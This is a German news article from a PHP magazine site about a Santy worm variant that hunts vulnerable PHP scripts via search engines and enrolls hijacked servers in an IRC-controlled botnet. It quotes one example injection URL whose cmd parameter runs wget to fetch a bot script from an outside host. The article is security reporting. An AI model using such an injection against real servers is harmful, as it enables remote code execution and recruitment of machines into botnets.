1. PHP Magazin
  2. Software & Web-Development
  3. Wurm attackiert PHP-Skripte

Wurm attackiert PHP-Skripte

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700

Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:


http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;


Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.


hiese.de
Author

Erfahrungen

Es sind noch keine Kommentare vorhanden.

Hier Kannst Du einen Kommentar verfassen


Bitte gib mindestens 10 Zeichen ein.
Wird geladen... Bitte warte.
* Pflichtangabe

Verwandte Beiträge

Microsoft mit neuem Logo

Seit 25 Jahren gibt es nun das bekannte Microsoft-Logo. Jetzt wollen die Microsoft Manager nicht nur Ihre Software auffrischen, auch das Logo bekommt ein Facelifting. ...

admin

Autor : admin
Kategorie: Dies und Das

11. September hat Teile des Internet schon verändert

Dass auch das Internet sich unter dem Einfluss des Anschlages in Amerika verändern wird, hat schon erste Formen angenommen. Erste Betreiber von 'Anonymous Mail Servern' haben ihre Dienste eingestellt. Ein 'Anonymous'-Dienst war z.B. die Firma Randsee ...

admin

Autor : admin
Kategorie: Software & Web-Development

Lücken in Datenbank MySQL

Der Sicherheitsspezialist Stefano Di Paola hat mehrere Schwachstellen in der Open-Source-Datenbank MySQL aufgedeckt, die ein auf dem System angemeldeter Nutzer zum Erhöhen seiner Zugriffsrechte missbrauchen kann. Di Paola hat dazu auch bereits zwei Proof- ...

admin

Autor : admin
Kategorie: Software & Web-Development

TinyMCE 3.4.4 wurde veröffentlicht

Einer der bekanntesten WYSIWYG-Editoren, der TinyMCE, ist in der Version 3.4.4 erschienen. ...

phpler

Autor : phpler
Kategorie: Dies und Das

Mit Web-Templates Geld verdienen

Web-Templates gewinnen immer mehr an Bedeutung. Erfahre hier, wie du dir mit dem TemplateMonster-Marktplatz neue Verkaufswege erschließen kannst. ...

admin

Autor : admin
Kategorie: Dies und Das

Mono öffnet Windows für Linux

Microsoft und Linux, die beiden Begriffe stehen bisher für zwei Antipoden in der IT-Welt. Doch mit .NET könnte das alles anders werden. Die Projekte Mono, Rotor und Portable .NET übertragen die Microsoft-Plattform auf Nicht-Windows-Systeme und sollen den ...

admin

Autor : admin
Kategorie: Software & Web-Development

Magazin & Tutorials
StepStone
Finde den richtigen Job
Düsseldorf, Deutschland

Pressemitteilung veröffentlichen

pressemitteilung veröffentlichen

Teile Deine News und Informationen mit anderen

Du möchtest andere User über ein interessantes IT-Thema informieren, dann melde Dich jetzt an und teile es mit unserer PHP-Community

mehr erfahren

Angebot eintragen